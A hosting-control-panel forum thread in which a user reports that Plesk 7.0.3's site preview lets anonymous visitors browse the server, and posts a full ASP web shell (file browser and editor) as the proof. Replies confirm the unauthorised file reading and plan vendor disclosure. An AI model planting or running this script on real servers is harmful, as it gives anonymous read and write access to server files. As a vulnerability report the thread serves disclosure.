• If you are still using CentOS 7.9, it's time to convert to Alma 8 with the free centos2alma tool by Plesk or Plesk Migrator. Please let us know your experiences or concerns in this thread:
    CentOS2Alma discussion

Site before propagate: BUG SECURITY ?

D

DanivalBrazil

Guest
Hi!

Copy the asp script below e paste into file. (index.asp). Access for the ip address, like: http://xx.xx.xx.xx/your-domain.com/index.asp .


Code: 
<%@ language="vbscript" %>
<% Option Explicit %>
<object runat="server" scope="page" id="fsoEdit"
progid="Scripting.FileSystemObject">
</object>

<%
	Const STR_DIR_GIF = "se_folder.gif"
	Const STR_UNK_GIF = "se_unknown.gif"
	Const DET_NAME = 0
	Const DET_SIZE = 1
	Const DET_DATE = 2
	
	Const DET_NAME_COLS = 3
	
	Dim strSERoot
	strSERoot = Server.MapPath("/")
	
	Dim strSEScript
	strSEScript = Request.ServerVariables("SCRIPT_NAME")

	Function GetParm(strName)
		If IsEmpty(Request.Form(strName)) Then
			GetParm = Request.QueryString(strName)
		Else
			GetParm = Request.Form(strName)
		End If
	End Function
	
	Function GetFileGIFName(strFName)
		Dim strGif
		
		strGif = "se_" + Trim(fsoEdit.GetExtensionName(strFName)) + ".gif"
		
		If Not fsoEdit.FileExists(strSERoot + "\" + strGif) Then
			GetFileGIFName = STR_UNK_GIF
		Else
			GetFileGIFName = strGif
		End If
	End Function
	
	Function MakeIconImg(strFName)
		MakeIconImg = "<img height=""16"" width=""16"" src=""" + strFName + """>"
	End Function

	Function CanEdit(fileCur)
		Select Case fsoEdit.GetExtensionName(fileCur.Name)
		Case "asp", "inc", "txt", "html", "htm" , "shtml", "cgi", "asa", "pl", "shtm", "php", "ASP", "PHP", "sql", "aspx", "ASPX"
			CanEdit = True
		Case Else
			CanEdit = False
		End Select
	End Function

	Function MakeDirLink(fld, strDir)
		If strDir = ".." Then
			MakeDirLink = "<a href=""" + strSEScript + "?CWD=" + Server.URLEncode(fld.ParentFolder) + """>" + strDir + "</a>"
		Else
			MakeDirLink = "<a href=""" + strSEScript + "?CWD=" + Server.URLEncode(fsoEdit.BuildPath(fld.Path, strDir)) + """>" + strDir + "</a>"
		End If
	End Function
	
	Function MakeFileLink(fileCur)
		If CanEdit(fileCur) Then
			MakeFileLink = "<a href=""" + strSEScript + "?File=" + Server.URLEncode(fileCur.Path) + """>" + fileCur.Name + "</a>"
		Else
			MakeFileLink = fileCur.Name
		End If
	End Function
	
	Function ShowDirList(strPath, iDetail)
		Dim fld
		
		Set fld = fsoEdit.GetFolder(strPath)
		
		Dim strOut
		strOut = ""
		If Not fld.IsRootFolder Then
			strOut = "<tr><td>" + MakeIconImg(STR_DIR_GIF) + "&nbsp;" + MakeDirLink(fld, "..") + "</td></tr>" + vbCR
		End If
		
		Dim iCur
		iCur = 0
		
		Dim dirCur
		
		For Each dirCur In fld.SubFolders
			Select Case iDetail
			Case DET_NAME
				If strOut = "" Then
					strOut = "<tr>"
				End If
				strOut = strOut + "<td>" + MakeIconImg(STR_DIR_GIF) + "&nbsp;" + MakeDirLink(fld, dirCur.Name) + "</td>"
				iCur = iCur + 1
				If iCur Mod DET_NAME_COLS = 0 Then
					strOut = strOut + "</tr>" + vbCR + "<tr>"
				End If
			End Select
		Next

		Dim fileCur
		For Each fileCur In fld.Files
			Select Case iDetail
			Case DET_NAME
				If strOut = "" Then
					strOut = "<tr>"
				End If
				strOut = strOut + "<td>" + MakeIconImg(GetFileGIFName(fileCur.Name)) + "&nbsp;" + MakeFileLink(fileCur) + "</td>"
				iCur = iCur + 1
				If iCur Mod DET_NAME_COLS = 0 Then
					strOut = strOut + "</tr>" + vbCR + "<tr>"
				End If
			End Select
		Next
			
		If strOut <> "" Then
			strOut = strOut + "</tr>" + vbCR
		End If
				
		ShowDirList = strOut
	End Function

	Sub BackupFile(strFName)
		Dim strBFName
		strBFName = strFName + ".BAK"
		
		If Not fsoEdit.FileExists(strFName) Then
			Exit Sub
		End If
		
		If fsoEdit.FileExists(strBFName) Then
			fsoEdit.DeleteFile strBFName, True
		End If
		
		fsoEdit.CopyFile strFName, strBFName, True
		
		fsoEdit.DeleteFile strFName, True
	End Sub
	
	Sub SaveTextFile(strFName, strText)
		Dim ts
		Set ts = fsoEdit.CreateTextFile(strFName, True)
		
		ts.Write strText
		
		ts.Close
		Set ts = Nothing
	End Sub
	
	Dim strFName
	strFName = GetParm("File")
	
	Dim fEditing
	fEditing = False
	
	Dim fileEdit
	
	Dim strAct
	strAct = GetParm("btnAction")
	If Not IsEmpty(strAct) Then
		Dim strOFName
		
		If IsEmpty(GetParm("OrgFName")) Then
			strOFName = strFName
		Else
			strOFName = fsoEdit.BuildPath(GetParm("CWD"), GetParm("OrgFName"))			
		End If
		
		If Not IsEmpty(GetParm("CWD")) Then
			strFName = fsoEdit.BuildPath(GetParm("CWD"), strFName)
		End If
					
		Select Case strAct
		Case "Save"
			If strOFName <> strFName Then
				' rename operation
				If fsoEdit.FileExists(strOFName) Then
					BackupFile strOFName
					fsoEdit.DeleteFile strOFName
				End If
			End If
			BackupFile strFName
			SaveTextFile strFName, GetParm("txtEdit")
		Case "Save As"
			BackupFile strFName
			SaveTextFile strFName, GetParm("txtEdit")
		Case "Delete"
		End Select
	End If
			
	If Not IsEmpty(strFName) Then
		If fsoEdit.FileExists(strFName) Then
			fEditing = True
			Set fileEdit = fsoEdit.GetFile(strFName)
		Else
			strFName = Empty
		End If
	End If
	
	Dim strCWD
	
	strCWD = GetParm("CWD")
	If IsEmpty(strCWD) Then
		If Not IsEmpty(strFName) Then
			strCWD = fsoEdit.GetParentFolderName(strFName)
		Else
			strCWD = strSERoot
		End If
	End If
%>

<html>

<head>
<title>C0BR4S - <%=strCWD%></title>
</head>
<body>
<h1>Editar Site</h1>
<%
	If Not fEditing Then
%>
<h3>Diret&oacute;rio <%=strCWD%></h3>
<table>
<%=ShowDirList(strCWD, DET_NAME)%>
</table>
<%
	Else
%>
<form method="post" action="<%=strSEScript%>">
<input type="hidden" name="CWD" value="<%=fileEdit.ParentFolder%>">
<input type="hidden" name="OrgFName" value="<%=fileEdit.Name%>">
  <h3>Arquivo 
    <input type="text" name="File" value="<%=fileEdit.Name%>"></h3>
<p><%=MakeIconImg(STR_DIR_GIF)%>&nbsp;<%=MakeDirLink(fileEdit, "..")%></p>
<table border="1">
	<tr>
		<td><textarea cols="80" rows="20" name="txtEdit"><%
	Dim ts
	Set ts = fileEdit.OpenAsTextStream()
	Dim strLine
	
	While Not ts.AtEndOfStream
		strLine = ts.ReadLine
		Response.Write Server.HTMLEncode(strLine) + vbCr
	Wend
	
	ts.Close
	Set ts = Nothing
%></textarea></td>
	</tr>
	<tr>
		<td>
        <input type="submit" name="btnAction" value="Salvar">
        &nbsp;
        <input type="submit" name="btnAction" value="Salvar como">
        &nbsp;
        <input type="submit" name="btnAction" value="Apagar">
        &nbsp;<input type="reset" name="btnAction"></td>
	</tr>
</table>
</form>
<%
	End If
%>
</body>
</html>

Browse in the server!!!

How do I fix it???



Danival - from Brazil
 
I think you have wrong permissions...
I can browse only domain with this script, not server
 
I see the problem and I maybe can help explain in English.

If you put this file into a domain's httpdocs directory then view the file through the Site Preview tool, you can use the posted ASP script to delve down into the filesystem of the server itself.

I put this on our test server and was able to navigate down to the root of the partition I have Plesk and the customer domains on. I could read files that an anonymous user had absolutely no business reading.

And I did it all through an anonymous connection.

Next I plan on testing this with Plesk 7.5. I'll report here if I find that the problem carries over.

Thank you for discovering this Danival. I'm going to report this to SW-Soft today along with another exploit I found in Plesk 7.5. I'm not going to go into that one though since I believe disclosing exploits should be done to the software vendor first before giving it to the general public.
 
Thanks Mertz,

Its is a bug in the 7.03 only. I hope for a bugfix for this version, because the 7.5 have a lot of bugs...

Thanks for the explanation, my English is horrible...
 
You must log in or register to reply here.

Similar threads

M
Prb Login Plesk 9.5.4 Centos
Replies
0
Views
6K
micumo
M
Back
Top